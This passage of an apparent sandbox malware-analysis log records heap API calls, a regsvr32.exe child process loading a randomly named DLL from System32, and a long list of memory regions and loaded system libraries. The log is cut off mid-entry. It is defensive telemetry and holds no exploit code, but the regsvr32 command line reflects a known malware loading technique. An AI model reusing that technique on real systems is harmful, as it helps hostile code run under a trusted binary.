(dwErrCode=0x57) [0089.192] GetLastError () returned 0x57 [0089.192] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c8) returned 0x5e1fd0 [0089.192] SetLastError (dwErrCode=0x57) Thread: id = 13 os_tid = 0xcac [0089.572] GetLastError () returned 0x57 [0089.572] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x80) returned 0x5e45a0 [0089.572] SetLastError (dwErrCode=0x57) [0089.572] GetLastError () returned 0x57 [0089.572] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c8) returned 0x600ec0 [0089.572] SetLastError (dwErrCode=0x57) Process: id = "3" image_name = "regsvr32.exe" filename = "c:\\windows\\system32\\regsvr32.exe" page_root = "0x4ecbd000" os_pid = "0xde0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xb54" cmd_line = "C:\\Windows\\system32\\regsvr32.exe \"C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 560 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 561 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 562 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 563 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 564 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 565 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 566 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 567 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 568 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 569 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 570 start_va = 0x7ff703d30000 end_va = 0x7ff703d38fff monitored = 1 entry_point = 0x7ff703d32810 region_type = mapped_file name = "regsvr32.exe" filename = "\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe") Region: id = 571 start_va = 0x7ffe97fe0000 end_va = 0x7ffe981a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 572 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 573 start_va = 0x7ffe954a0000 end_va = 0x7ffe9554cfff monitored = 0 entry_point = 0x7ffe954b81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 574 start_va = 0x7ffe94740000 end_va = 0x7ffe94927fff monitored = 0 entry_point = 0x7ffe9476ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 575 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 576 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 577 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 578 start_va = 0x7ffe92470000 end_va = 0x7ffe924e8fff monitored = 0 entry_point = 0x7ffe9248fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 580 start_va = 0x7df5ffe40000 end_va = 0x7df5ffebdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 581 start_va = 0x7ffe7b890000 end_va = 0x7ffe7bd12fff monitored = 0 entry_point = 0x7ffe7b894e70 region_type = mapped_file name = "aclayers.dll" filename = "\\Windows\\AppPatch\\apppatch64\\AcLayers.dll" (normalized: "c:\\windows\\apppatch\\apppatch64\\aclayers.dll") Region: id = 582 start_va = 0x7ffe97f40000 end_va = 0x7ffe97fdcfff monitored = 0 entry_point = 0x7ffe97f478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 583 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 584 start_va = 0x7ffe95670000 end_va = 0x7ffe957c5fff monitored = 0 entry_point = 0x7ffe9567a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 585 start_va = 0x7ffe957d0000 end_va = 0x7ffe95955fff monitored = 0 entry_point = 0x7ffe9581ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 586 start_va = 0x7ffe95df0000 end_va = 0x7ffe95e41fff monitored = 0 entry_point = 0x7ffe95dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 587 start_va = 0x7ffe95960000 end_va = 0x7ffe95bdcfff monitored = 0 entry_point = 0x7ffe95a34970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 588 start_va = 0x7ffe95550000 end_va = 0x7ffe9566bfff monitored = 0 entry_point = 0x7ffe955902b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 589 start_va = 0x7ffe950f0000 end_va = 0x7ffe95159fff monitored = 0 entry_point = 0x7ffe95126d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 590 start_va = 0x180000000 end_va = 0x180002fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 591 start_va = 0x7ffe80570000 end_va = 0x7ffe805f3fff monitored = 0 entry_point = 0x7ffe80582830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 592 start_va = 0x7ffe94490000 end_va = 0x7ffe944b8fff monitored = 0 entry_point = 0x7ffe944a4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 593 start_va = 0x7ffe8cd30000 end_va = 0x7ffe8cd40fff monitored = 0 entry_point = 0x7ffe8cd33e10 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 594 start_va = 0x400000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 595 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 596 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 597 start_va = 0x400000 end_va = 0x438fff monitored = 0 entry_point = 0x4012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 598 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 599 start_va = 0x600000 end_va = 0x787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 600 start_va = 0x7ffe97c00000 end_va = 0x7ffe97c3afff monitored = 0 entry_point = 0x7ffe97c012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 601 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "regsvr32.exe.mui" filename = "\\Windows\\System32\\en-US\\regsvr32.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\regsvr32.exe.mui") Region: id = 602 start_va = 0x790000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 603 start_va = 0x920000 end_va = 0x1d1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 604 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 605 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 606 start_va = 0x7ffe97600000 end_va = 0x7ffe976a6fff monitored = 0 entry_point = 0x7ffe976158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 607 start_va = 0x7ffe97590000 end_va = 0x7ffe975eafff monitored = 0 entry_point = 0x7ffe975a38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 608 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 609 start_va = 0x7ffe97df0000 end_va = 0x7ffe97f32fff monitored = 0 entry_point = 0x7ffe97e18210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 610 start_va = 0x7ffe89410000 end_va = 0x7ffe89683fff monitored = 0 entry_point = 0x7ffe89480400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 611 start_va = 0x1d20000 end_va = 0x1ddffff monitored = 0 entry_point = 0x1d40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 612 start_va = 0x480000 end_va = 0x480fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 613 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 614 start_va = 0x1d20000 end_va = 0x1dfcfff monitored = 0 entry_point = 0x1d7e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 615 start_va = 0x7ffe94680000 end_va = 0x7ffe9468efff monitored = 0 entry_point = 0x7ffe94683210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 616 start_va = 0x7ffe92f80000 end_va = 0x7ffe93015fff monitored = 0 entry_point = 0x7ffe92fa5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 617 start_va = 0x1d20000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 618 start_va = 0x1d20000 end_va = 0x1daffff monitored = 0 entry_point = 0x1d23040 region_type = mapped_file name = "gqeyw.dl" filename = "\\Windows\\System32\\GnynPsiyLKdYjn\\GQeyw.dl" (normalized: "c:\\windows\\system32\\gnynpsiylkdyjn\\gqeyw.dl") Region: id = 619 start_va = 0x1dd0000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 620 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 621 start_va = 0x7ffe95e70000 end_va = 0x7ffe973cefff monitored = 0 entry_point = 0x7ffe95fd11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 622 start_va = 0x7ffe95390000 end_va = 0x7ffe953d2fff monitored = 0 entry_point = 0x7ffe953a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 623 start_va = 0x7ffe94a80000 end_va = 0x7ffe950c3fff monitored = 0 entry_point = 0x7ffe94c464b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 624 start_va = 0x7ffe949c0000 end_va = 0x7ffe94a74fff monitored = 0 entry_point = 0x7ffe94a022e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 625 start_va = 0x7ffe94600000 end_va = 0x7ffe9464afff monitored = 0 entry_point = 0x7ffe946035f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 626 start_va = 0x7ffe94660000 end_va = 0x7ffe94673fff monitored = 0 entry_point = 0x7ffe946652e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 627 start_va = 0x7ffe8e340000 end_va = 0x7ffe8e59ffff monitored = 0 entry_point = 0x7ffe8e3eb5b0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 628 start_va = 0x1de0000 end_va = 0x7d43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 629 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 630 start_va = 0x1de0000 end_va = 0x1e37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 631 start_va = 0x1e40000 end_va = 0x1e99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 632 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 633 start_va = 0x7ffe951c0000 end_va = 0x7ffe95386fff monitored = 0 entry_point = 0x7ffe9521db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 634 start_va = 0x7ffe94650000 end_va = 0x7ffe9465ffff monitored = 0 entry_point = 0x7ffe946556e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 635 start_va = 0x7ffe8ac40000 end_va = 0x7ffe8adf7fff monitored = 0 entry_point = 0x7ffe8acae630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 636 start_va = 0x7ffe8eb60000 end_va = 0x7ffe8eee1fff monitored = 0 entry_point = 0x7ffe8ebb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 637 start_va = 0x7ffe93d60000 end_va = 0x7ffe93d7efff monitored = 0 entry_point = 0x7ffe93d65d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 638 start_va = 0x7ffe89ce0000 end_va = 0x7ffe89f6dfff monitored = 0 entry_point = 0x7ffe89db0f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 639 start_va = 0x7ffe92df0000 end_va = 0x7ffe92e02fff monitored = 0 entry_point = 0x7ffe92df2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 640 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 641 start_va = 0x4d0000 end_va = 0x4edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 642 start_va = 0x4f0000 end_va = 0x4fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 643 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 644 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 645 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 646 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 647 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 648 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 649 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 650 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 651 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 652 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 653 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 654 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 655 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 656 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 657 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 658 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 659 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 660 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 661 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 662 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 663 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 664 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 665 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 666 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 667 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 668 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 669 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 670 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 671 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 672 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 673 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 674 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 675 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 676 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 677 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 678 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 679 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 680 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 681 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 682 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 683 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 684 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 685 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 686 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 687 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 688 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 689 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 690 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 691 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 692 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 693 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 694 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 695 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 696 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 697 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 698 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 699 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 700 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 701 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 702 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 703 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 704 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 705 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 706 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 